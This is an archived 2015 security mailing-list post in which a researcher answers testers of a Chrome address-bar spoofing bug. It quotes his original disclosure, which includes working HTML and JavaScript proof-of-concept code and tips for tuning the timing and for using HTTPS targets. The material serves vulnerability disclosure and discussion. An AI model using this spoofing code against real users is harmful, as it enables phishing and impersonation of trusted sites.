lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <5593ED82.6000806@deusen.co.uk> Date: Wed, 01 Jul 2015 14:39:14 +0100 From: David Leo <david.leo@...sen.co.uk> To: bugtraq@...urityfocus.com, fulldisclosure@...lists.org, oss-security@...ts.openwall.com Subject: Re: [FD] Google Chrome Address Spoofing (Request For Comment) http://seclists.org/fulldisclosure/2015/Jun/109 Big Whale said: "Tested on Google Chrome 43.0.2357.130 (64-bit) (Linux) and it works" "clearly URL spoofing" Thanks for testing! http://seclists.org/oss-sec/2015/q3/0 0pc0deFR said: "Work on Google Chrome Ubuntu" Bonjour, thanks for testing! http://seclists.org/oss-sec/2015/q2/824 Daniel Micay said: "It does display a window with the oracle.com address" "why you've got an ever increasing number of setTimeout events" http://seclists.org/oss-sec/2015/q2/823 Alexander E. Patrakov said: "Looks like a fork bomb" Thanks for testing! The number of "setTimeout" does NOT need to be increasing forever. OK, I admit - we are lazy(it works and we don't touch it anymore) :-) http://seclists.org/oss-sec/2015/q3/2 Roney Gomes said: "it worked on the desktop version of Opera" Wow! Thanks for letting us know. Here is the screenshot of Opera http://www.deusen.co.uk/items/gwhere.6128645971389012/OperaScreenshot.png And Chrome http://www.deusen.co.uk/items/gwhere.6128645971389012/ChromeScreenshot.png (A number is displayed in Chrome's address bar, not the same as Opera) http://seclists.org/oss-sec/2015/q2/826 Daniel Micay said: "it can't always be replicated" "I've tried it a few times and" "it fails about as often as it works" http://seclists.org/oss-sec/2015/q3/4 Valentinas Bakaitis said: "PoC did not work" Hey! The trick here is timing: Please modify those numbers in code - make them smaller. http://seclists.org/oss-sec/2015/q3/5 Zak Siddiqui said: "Is it reproducible with HTTPS?" Yes, we just tried this URL https://en.wikipedia.org/wiki/Main_Page It works. In fact, it works BETTER against HTTPS, because HTTPS is slower, so timing is easier. http://seclists.org/oss-sec/2015/q2/825 Florian Weimer said: "they show the new URL while still displaying old content" Exactly, that's the cause of this bug. In the end, allow me to repeat: No user interaction on the fake page. But, anyone can do "BBB Accredited Business" "PayPal Partner" etc. Kind Regards, PS We love clever tricks. We love this: http://dieyu.org/ On 2015/6/30 7:08, David Leo wrote: > Impact: > The "click to verify" thing is completely broken... > Anyone can be "BBB Accredited Business" etc. > You can make whitehouse.gov display "We love Islamic State" :-) > > Note: > No user interaction on the fake page. > > Code: > ***** index.html > <script> > function next() > { > w.location.replace('http://www.oracle.com/index.html?'+n);n++; > setTimeout("next();",15); > setTimeout("next();",25); > } > function f() > { > w=window.open("content.html","_blank","width=500 height=500"); > i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5); > } > </script> > <a href="#" onclick="f()">Go</a><br> > ***** content.html > <b>This web page is NOT oracle.com</b> > <script>location="http://www.oracle.com/index.html";</script> > ***** It's online > http://www.deusen.co.uk/items/gwhere.6128645971389012/ > (The page says "June/16/2015" - it works as we tested today) > > Request For Comment: > We reported this to Google. > They reproduced, and say > It's DoS which doesn't matter. > We think it's very strange, > since the browser does not crash(not DoS), > and the threat is obvious. > What's your opinion? > > Kind Regards, > > PS > We love clever tricks. > We love this: > http://dieyu.org/ _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists